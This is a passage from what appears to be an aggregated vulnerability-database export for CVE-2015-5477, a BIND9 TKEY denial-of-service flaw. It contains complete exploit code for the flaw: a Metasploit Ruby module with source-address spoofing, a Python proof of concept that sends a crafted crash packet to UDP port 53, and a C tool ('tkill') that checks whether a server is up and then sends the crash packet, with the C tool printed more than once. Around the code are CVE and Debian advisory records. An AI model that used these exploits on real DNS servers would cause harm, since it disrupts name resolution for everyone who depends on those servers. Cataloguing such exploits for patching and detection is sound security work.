Class: IN (0x0001)\n query << ttl # Time to live\n query << data_length # Data length\n query << txt_length # TXT Length\n query << txt # TXT\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/dns/bind_tkey.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-09-25T01:05:44", "description": "This module sends a malformed TKEY query, which exploits an error in handling TKEY queries on affected BIND9 'named' DNS servers. As a result, a vulnerable named server will exit with a REQUIRE assertion failure. This condition can be exploited in versions of BIND between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0 through 9.10.2-P2.\n", "edition": 2, "cvss3": {}, "published": "2015-08-01T11:01:35", "type": "metasploit", "title": "BIND TKEY Query Denial of Service", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2018-11-16T18:18:28", "id": "MSF:AUXILIARY/DOS/DNS/BIND_TKEY", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Capture\n include Msf::Auxiliary::UDPScanner\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BIND TKEY Query Denial of Service',\n 'Description' => %q{\n This module sends a malformed TKEY query, which exploits an\n error in handling TKEY queries on 
affected BIND9 'named' DNS servers.\n As a result, a vulnerable named server will exit with a REQUIRE\n assertion failure. This condition can be exploited in versions of BIND\n between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0\n through 9.10.2-P2.\n },\n 'Author' => [\n 'Jonathan Foote', # Original discoverer\n 'throwawayokejxqbbif', # PoC\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2015-5477'],\n ['URL', 'https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/'],\n ['URL', 'https://kb.isc.org/article/AA-01272']\n ],\n 'DisclosureDate' => '2015-07-28',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {'ScannerRecvWindow' => 0}\n ))\n\n register_options([\n Opt::RPORT(53),\n OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])\n ])\n\n deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')\n end\n\n def scan_host(ip)\n if datastore['SRC_ADDR']\n scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])\n else\n print_status(\"Sending packet to #{ip}\")\n scanner_send(payload, ip, rport)\n end\n end\n\n def payload\n name = Rex::Text.rand_text_alphanumeric(rand(42) + 1)\n txt = Rex::Text.rand_text_alphanumeric(rand(42) + 1)\n\n name_length = [name.length].pack('C')\n txt_length = [txt.length].pack('C')\n data_length = [txt.length + 1].pack('n')\n ttl = [rand(2 ** 31 - 1) + 1].pack('N')\n\n query = \"\\x00\\x00\" # Transaction ID: 0x0000\n query << \"\\x00\\x00\" # Flags: 0x0000 Standard query\n query << \"\\x00\\x01\" # Questions: 1\n query << \"\\x00\\x00\" # Answer RRs: 0\n query << \"\\x00\\x00\" # Authority RRs: 0\n query << \"\\x00\\x01\" # Additional RRs: 1\n\n query << name_length # [Name Length]\n query << name # Name\n query << \"\\x00\" # [End of name]\n query << \"\\x00\\xf9\" # Type: TKEY (Transaction Key) (249)\n query << \"\\x00\\x01\" # Class: IN (0x0001)\n\n query << name_length # [Name Length]\n query << name # 
Name\n query << \"\\x00\" # [End of name]\n query << \"\\x00\\x10\" # Type: TXT (Text strings) (16)\n query << \"\\x00\\x01\" # Class: IN (0x0001)\n query << ttl # Time to live\n query << data_length # Data length\n query << txt_length # TXT Length\n query << txt # TXT\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/dns/bind_tkey.rb", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:20", "description": "\nISC BIND 9 - TKEY Remote Denial of Service (PoC)", "edition": 2, "cvss3": {}, "published": "2015-08-05T00:00:00", "title": "ISC BIND 9 - TKEY Remote Denial of Service (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-05T00:00:00", "id": "EXPLOITPACK:46DEBFAC850194C04C54F93E0DFF5F4F", "href": "", "sourceData": "#!/usr/bin/env python\n\n# Exploit Title: PoC for BIND9 TKEY DoS\n# Exploit Author: elceef\n# Software Link: https://github.com/elceef/tkeypoc/\n# Version: ISC BIND 9\n# Tested on: multiple\n# CVE : CVE-2015-5477\n\n\nimport socket\nimport sys\n\nprint('CVE-2015-5477 BIND9 TKEY PoC')\n\nif len(sys.argv) < 2:\n\tprint('Usage: ' + sys.argv[0] + ' [target]')\n\tsys.exit(1)\n\nprint('Sending packet to ' + sys.argv[1] + ' ...')\n\npayload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 
41'.replace(' ', '').decode('hex')) \n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.sendto(payload, (sys.argv[1], 53))\n\nprint('Done.')", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-04-01T19:04:20", "description": "\nISC BIND 9 - TKEY (PoC)", "edition": 2, "cvss3": {}, "published": "2015-08-01T00:00:00", "title": "ISC BIND 9 - TKEY (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-01T00:00:00", "id": "EXPLOITPACK:BE4F638B632EA0754155A27ECC4B3D3F", "href": "", "sourceData": "/*\n PoC for BIND9 TKEY assert Dos (CVE-2015-5477)\n\n Usage:\n tkill <hostname>\n\n What it does:\n - First sends a \"version\" query to see if the server is up.\n - Regardless of the version response, it then sends the DoS packet.\n - Then it waits 5 seconds for a response. If the server crashes,\n there will be no response.\n\n Notes:\n - multiple hostnames can be specified on the command-line\n - IP addresses can be specified instead of hostnames\n - supports IPv4 and IPv6\n - runs on Linux, Mac, and Windows (cygwin or VisualStudio)\n - if a hostname resolves to more than one IP, then all IPs\n will be probed\n\n About the vuln:\n For control information, the \"TSIG\" feature allows packets to be\n signed with a password. 
This allows slave servers to get updates\n from master servers without a MitM attack (like from the NSA)\n changing the data on the network.\n\n A password can be distributed out of band, such as SSHing into\n a box and editing the configuration file. Another way is through\n public-keys. That's the \"TKEY\" feature: it distributes new\n TSIG passwords using public-keys.\n\n When processing a TKEY packet, the code will call a function to\n fetch the proper TKEY record. It looks in two places: the\n \"answer records\" section, and the \"additional records\" section.\n If it can't find it in the \"additional\", it looks in \"answer\".\n\n The lookup function takes a parameter that is initially set\n to NULL. During the failed lookup in the \"additional\" section,\n it may set that parameter to a non-null value. Since a non-null\n value is passed in again during the second lookup in the \"answer\"\n section, the code crashes.\n\n The patch was to set the variable to NULL before the second lookup.\n\n The correct fix would simply not check to see if the parameter\n was NULL to begin with. It's an out-only parameter, so its value\n on input doesn't matter.\n\n This is just a \"brainfart\" bug that can only result in a crash\n of the server. It can't result in data-corruption or code\n execution.\n\n About this code:\n To learn about writing network code, this is probably something useful\n to study.\n\n It works on both Windows and Unix (Linux, Mac, etc.). You can see where\n the differences are between the two platforms, as well as the similarities.\n\n It works on both IPv4 and IPv6. However, if you search through the code,\n you'll find nothing that specifically references either version. It's\n magically dual-stack.
That's because it uses new functions like\n \"getaddrinfo()\" instead of old functions like \"gethostbyname()\".\n \n*/\n#include <stdio.h>\n#include <string.h>\n#include <ctype.h>\n\n#ifdef WIN32\n#include <winsock2.h>\n#include <ws2tcpip.h>\n#pragma comment(lib, \"Ws2_32.lib\")\n#define WSA(err) (WSA##err)\n#define WSAEAGAIN WSAETIMEDOUT\n#else\n#include <unistd.h>\n#include <sys/types.h>\n#include <sys/socket.h>\n#include <netdb.h>\n#include <arpa/inet.h>\n#include <errno.h>\n#define WSAGetLastError() (errno)\n#define WSA(err) (err)\n#define closesocket(fd) close(fd)\n#endif\n\n/*\n * DoS packet that will crash server\n */\nstatic const unsigned char dospacket[] = {\n 0x01, 0x02, /* xid */\n 0x01, 0x00, /* query */\n 0x00, 0x01, /* one question */\n 0x00, 0x00, /* no answer */\n 0x00, 0x00, /* no authorities */\n 0x00, 0x01, /* one additional: must be 'additional' section to work*/\n\n /* Query name */\n 0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00,\n 0x00, 249, /* TKEY record type */\n 0x00, 255,\n\n /* Additional record */\n 0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00, /* name: must be same as query */\n 0x00, 16, /* record type: must NOT be 249/TKEY */\n 0x00, 255,\n 0, 0, 0, 0,\n 0, 51,\n 50,\n 'h', 't', 't', 'p', 's', ':', '/', '/', \n 'g', 'i', 't', 'h', 'u', 'b', '.', 'c', \n 'o', 'm', '/', 'r', 'o', 'b', 'e', 'r', \n 't', 'd', 'a', 'v', 'i', 'd', 'g', 'r', \n 'a', 'h', 'a', 'm', '/', 'c', 'v', 'e', \n '-', '2', '0', '1', '5', '-', '5', '4', \n '7', '7'\n};\n\n\n/*\n * Packet for querying the version of the server, to test if it's up\n */\nstatic const unsigned char versionpacket[] = {\n 0x03, 0x04, /* xid */\n 0x01, 0x00, /* query */\n 0x00, 0x01, /* one question */\n 0x00, 0x00, /* no answer */\n 0x00, 0x00, /* no authorities */\n 0x00, 0x00, /* no additional */\n\n /* Query name */\n 0x07, 'v', 'e', 'r', 's', 'i', 'o', 'n', 0x04, 'b', 'i', 'n', 'd', 0x00,\n 0x00, 16, /* TXT */\n 0x00, 3, /* CHOAS */\n};\n\n\n/*\n * YOLO BIND version.bind query\n 
*/\nint query_version(int fd, const struct addrinfo *target)\n{\n int bytes_received;\n int i;\n struct sockaddr_storage from;\n socklen_t sizeof_from = sizeof(from);\n char hostname[256];\n unsigned char buf[2048];\n int result = 0;\n\n /* \n * Query version \n */\n sendto(fd, (const char*)versionpacket, sizeof(versionpacket), 0, \n target->ai_addr, target->ai_addrlen);\n\n\n /* \n * get response \n */\nagain:\n bytes_received = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);\n if (bytes_received <= 0 && WSAGetLastError() == WSA(EAGAIN)) {\n fprintf(stderr, \"[-] timed out getting version, trying again\\n\");\n return 0;\n } else if (bytes_received <= 0) {\n fprintf(stderr, \"[-] unknown error receiving response: %u\\n\", WSAGetLastError());\n return 0;\n }\n getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\n\n /* \n * parse response \n */\n if (bytes_received < 12)\n goto again;\n if (buf[0] != versionpacket[0] && buf[1] != versionpacket[1])\n goto again;\n if ((buf[2]&0x80) != 0x80)\n goto again;\n\n /*\n * Handle respoonse code \n */\n switch (buf[3]&0x0F) {\n case 0:\n /* parse packet below */\n break;\n case 1:\n fprintf(stderr, \"[-] %s: FORMERR\\n\", hostname);\n return 1;\n case 2:\n fprintf(stderr, \"[-] %s: SRVFAIL\\n\", hostname);\n return 1;\n case 3:\n fprintf(stderr, \"[-] %s: NAMERR\\n\", hostname);\n return 1;\n case 4:\n fprintf(stderr, \"[-] %s: NOTIMPL\\n\", hostname);\n return 1;\n case 5:\n fprintf(stderr, \"[-] %s: REFUSED\\n\", hostname);\n return 1;\n default:\n fprintf(stderr, \"[-] %s: unknown error: %u\\n\", hostname, buf[3]);\n return 1;\n }\n\n\n i = 12; /* skip header */\n\n /* \n * skip query name \n */\n while (i < bytes_received) {\n if (buf[i] == 0) {\n i++;\n break;\n } else if ((buf[i] & 0xC0) == 0xC0) {\n i += 2;\n break;\n } else {\n i += buf[i] + 1;\n }\n }\n i += 4;\n\n /* \n * process all answers \n */\n while (i + 12 <= bytes_received) 
{\n int t, c, len;\n\n /* skip answer name */\n while (i < bytes_received) {\n if (buf[i] == 0) {\n i++;\n break;\n } else if ((buf[i] & 0xC0) == 0xC0) {\n i += 2;\n break;\n } else {\n i += buf[i] + 1;\n }\n }\n\n /* extract resource-recorder header */\n if (i + 10 > bytes_received)\n break;\n t = buf[i+0]<<8 | buf[i+1];\n c = buf[i+2]<<8 | buf[i+3];\n len = buf[i+8]<<8 | buf[i+9];\n i += 10;\n\n /* verify TXT CHAOS */\n if (t != 16 || c != 3) {\n i += len;\n continue;\n }\n\n /* fix len */\n if (len > bytes_received - i)\n len = bytes_received - i;\n\n /* print the hostname */\n fprintf(stderr, \"[+] %s: \", hostname);\n\n /* print the strings */\n {\n int j = i;\n\n i += len;\n\n while (j < i) {\n int len2 = buf[j];\n int k;\n j++;\n if (len2 > bytes_received - len2)\n len2 = bytes_received - len2;\n fprintf(stderr, \"\\\"\");\n\n for (k=j; k<j+len2; k++) {\n if (buf[k] == '\\\\')\n fprintf(stderr, \"\\\\\");\n else if (!isprint(buf[k]))\n fprintf(stderr, \"\\\\x%02x\", buf[k]);\n else\n fprintf(stderr, \"%c\", buf[k]);\n }\n\n j = k;\n\n fprintf(stderr, \"\\\" \");\n }\n fprintf(stderr, \"\\n\");\n }\n result = 1;\n }\n return result;\n}\n\n/*\n * Send the DoS packet\n */\nvoid probe(const struct addrinfo *target)\n{\n int fd;\n int x;\n int i;\n char hostname[256];\n char buf[2048];\n struct sockaddr_storage from;\n socklen_t sizeof_from = sizeof(from);\n \n \n /*\n * Print status\n */\n getnameinfo(target->ai_addr, target->ai_addrlen, hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\n fprintf(stderr, \"[+] %s: Probing...\\n\", hostname);\n\n /*\n * Create a socket\n */\n fd = socket(target->ai_family, SOCK_DGRAM, 0);\n if (fd <= 0) {\n fprintf(stderr, \"[-] failed: socket(): %u\\n\", WSAGetLastError());\n return;\n }\n\n /*\n * Set the timeout to 5-seconds\n */\n {\n#ifdef WIN32\n int milliseconds = 5000;\n x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&milliseconds, sizeof(milliseconds));\n#else\n struct timeval t;\n t.tv_sec = 5;\n t.tv_usec = 
0;\n x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&t, sizeof(t));\n#endif\n\n if (x != 0) {\n fprintf(stderr, \"[-] err setting recv timeout: %u\\n\", WSAGetLastError());\n }\n }\n\n\n /*\n * First, query the server to grab its version, but also to see it's up\n */\n fprintf(stderr, \"[+] Querying version...\\n\");\n for (i=0; i<3; i++) {\n if (query_version(fd, target))\n break;\n if (i == 2) {\n fprintf(stderr, \"[-] Can't query server, is it crashed already?\\n\");\n fprintf(stderr, \"[-] Sending exploit anyway.\\n\");\n }\n }\n\n\n /*****************\n * SEND DoS PACKET\n *****************/\n fprintf(stderr, \"[+] Sending DoS packet...\\n\");\n sendto(fd, (const char*)dospacket, sizeof(dospacket), 0, target->ai_addr, target->ai_addrlen);\n\n /* Grab response */\n fprintf(stderr, \"[+] Waiting 5-sec for response...\\n\");\n for (;;) {\n x = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);\n if (x <= 0 && WSAGetLastError() == WSA(EAGAIN)) {\n fprintf(stderr, \"[+] timed out, probably crashed\\n\");\n break;\n } else if (x <= 0) {\n fprintf(stderr, \"[-] unknown error receiving response: %u\\n\", WSAGetLastError());\n break;;\n }\n\n if (x > 2 && (buf[0] != dospacket[0] || buf[1] != dospacket[1]))\n continue;\n \n getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\n fprintf(stderr, \"[-] %s: got response, so probably not vulnerable\\n\", hostname);\n break;\n }\n\n\n closesocket(fd);\n}\n\n\n/*\n * The main function just parses the arguments and looks up IP addrsses\n * before calling the \"probe\" function to actually exploit the targets\n */\nint main(int argc, char *argv[])\n{\n int i;\n\n#ifdef WIN32\n {WSADATA x; WSAStartup(0x101, &x);}\n#endif\n\n fprintf(stderr, \"--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---\\n\");\n\n if (argc <= 1) {\n fprintf(stderr, \"[-] no host specified\\n\");\n fprintf(stderr, \"usage:\\n tkill <hostname>\\n\");\n return -1;\n }\n\n\n 
/*\n * Query all targets specified on the command line\n */\n for (i=1; i<argc; i++) {\n const char *hostname = argv[i];\n struct addrinfo *info;\n struct addrinfo *target;\n char oldtarget[256] = \"\";\n int x;\n\n /*\n * Lookup the name of the target\n */\n fprintf(stderr, \"[+] %s: Resolving to IP address\\n\", hostname);\n x = getaddrinfo(hostname, \"53\", 0, &info);\n if (x != 0) {\n fprintf(stderr, \"[-] %s: failed: %s\\n\", hostname, gai_strerror(x));\n continue;\n }\n\n if (info->ai_next) {\n fprintf(stderr, \"[+] %s: Resolved to multiple IPs (NOTE)\\n\", hostname);\n }\n\n /*\n * Since a name can return multiple IP addresses,\n * send a probe to all the results\n */\n for (target=info; target; target = target->ai_next) {\n char newtarget[256];\n\n /* bah, stupid bug in Linux gets the same target multiple\n * times */\n getnameinfo(target->ai_addr, target->ai_addrlen, newtarget, sizeof(newtarget), NULL, 0, NI_NUMERICHOST);\n if (strcmp(newtarget, oldtarget) == 0)\n continue;\n memcpy(oldtarget, newtarget, sizeof(oldtarget));\n\n probe(target);\n printf(\"\\n\");\n }\n\n /*\n * Cleanup\n */\n freeaddrinfo(info);\n }\n\n return 0;\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "cve": [{"lastseen": "2022-03-23T12:59:58", "description": "named in ISC BIND 9.x before 9.9.7-P2 and 9.10.x before 9.10.2-P3 allows remote attackers to cause a denial of service (REQUIRE assertion failure and daemon exit) via TKEY queries.", "cvss3": {}, "published": "2015-07-29T14:59:00", "type": "cve", "title": "CVE-2015-5477", "cwe": ["CWE-19"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2017-11-10T02:29:00", "cpe": ["cpe:/a:isc:bind:9.10.2", "cpe:/a:isc:bind:9.9.7"], "id": "CVE-2015-5477", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5477", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:isc:bind:9.9.7:p1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.2:p2:*:*:*:*:*:*"]}], "debian": [{"lastseen": "2021-12-01T16:59:55", "description": "Package : bind9\nVersion : 1:9.7.3.dfsg-1~squeeze16\nCVE ID : CVE-2015-5477\n\nJonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering an\nassertion failure and causing BIND to exit.", "cvss3": {}, "published": "2015-07-28T19:23:41", "type": "debian", "title": "[SECURITY] [DLA 285-1] bind9 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-28T19:23:41", "id": "DEBIAN:DLA-285-1:3629A", "href": "https://lists.debian.org/debian-lts-announce/2015/07/msg00023.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-01-30T00:48:58", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3319-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJuly 28, 2015 
https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : bind9\nCVE ID : CVE-2015-5477\n\nJonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering an\nassertion failure and causing BIND to exit.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1:9.8.4.dfsg.P1-6+nmu2+deb7u6.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1:9.9.5.dfsg-9+deb8u2.\n\nWe recommend that you upgrade your bind9 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2015-07-28T19:05:08", "type": "debian", "title": "[SECURITY] [DSA 3319-1] bind9 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-28T19:05:08", "id": "DEBIAN:DSA-3319-1:36EAC", "href": "https://lists.debian.org/debian-security-announce/2015/msg00215.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-21T22:51:37", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3319-1 
security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJuly 28, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : bind9\nCVE ID : CVE-2015-5477\n\nJonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering an\nassertion failure and causing BIND to exit.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1:9.8.4.dfsg.P1-6+nmu2+deb7u6.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1:9.9.5.dfsg-9+deb8u2.\n\nWe recommend that you upgrade your bind9 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2015-07-28T19:05:08", "type": "debian", "title": "[SECURITY] [DSA 3319-1] bind9 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-28T19:05:08", "id": "DEBIAN:DSA-3319-1:132B5", "href": "https://lists.debian.org/debian-security-announce/2015/msg00215.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-23T22:24:40", "description": "Package : bind9\nVersion : 1:9.7.3.dfsg-1~squeeze16\nCVE 
ID : CVE-2015-5477\n\nJonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering an\nassertion failure and causing BIND to exit.", "cvss3": {}, "published": "2015-07-28T19:23:41", "type": "debian", "title": "[SECURITY] [DLA 285-1] bind9 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-28T19:23:41", "id": "DEBIAN:DLA-285-1:53550", "href": "https://lists.debian.org/debian-lts-announce/2015/07/msg00023.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "zdt": [{"lastseen": "2018-03-14T06:36:43", "description": "Exploit for multiple platform in category dos / poc", "cvss3": {}, "published": "2015-08-05T00:00:00", "type": "zdt", "title": "ISC BIND9 TKEY Remote DoS PoC", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-05T00:00:00", "id": "1337DAY-ID-23970", "href": "https://0day.today/exploit/description/23970", "sourceData": "# Exploit Title: PoC for BIND9 TKEY DoS\r\n# Exploit Author: elceef\r\n# Software Link: https://github.com/elceef/tkeypoc/\r\n# Version: ISC BIND 9\r\n# Tested on: multiple\r\n# CVE : CVE-2015-5477\r\n \r\n#!/usr/bin/env python\r\n \r\nimport socket\r\nimport sys\r\n \r\nprint('CVE-2015-5477 BIND9 TKEY PoC')\r\n \r\nif len(sys.argv) < 2:\r\n print('Usage: ' + sys.argv[0] + ' [target]')\r\n sys.exit(1)\r\n \r\nprint('Sending 
packet to ' + sys.argv[1] + ' ...')\r\n \r\npayload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex')) \r\n \r\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nsock.sendto(payload, (sys.argv[1], 53))\r\n \r\nprint('Done.')\n\n# 0day.today [2018-03-14] #", "sourceHref": "https://0day.today/exploit/23970", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-02-19T23:28:39", "description": "Exploit for multiple platform in category dos / poc", "cvss3": {}, "published": "2015-08-01T00:00:00", "type": "zdt", "title": "BIND9 - TKEY PoC Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-01T00:00:00", "id": "1337DAY-ID-23948", "href": "https://0day.today/exploit/description/23948", "sourceData": "/*\r\n PoC for BIND9 TKEY assert Dos (CVE-2015-5477)\r\n \r\n Usage:\r\n tkill <hostname>\r\n \r\n What it does:\r\n - First sends a \"version\" query to see if the server is up.\r\n - Regardless of the version response, it then sends the DoS packet.\r\n - Then it waits 5 seconds for a response. If the server crashes,\r\n there will be no response.\r\n \r\n Notes:\r\n - multiple hostnames can be specified on the command-line\r\n - IP addresses can be specified instead of hostnames\r\n - supports IPv4 and IPv6\r\n - runs on Linux, Mac, and Windows (cygwin or VisualStudio)\r\n - if a hostname resolves to more than one IP, then all IPs\r\n will be probed\r\n \r\n About the vuln:\r\n For control information, the \"TSIG\" feature allows packets to be\r\n signed with a password. 
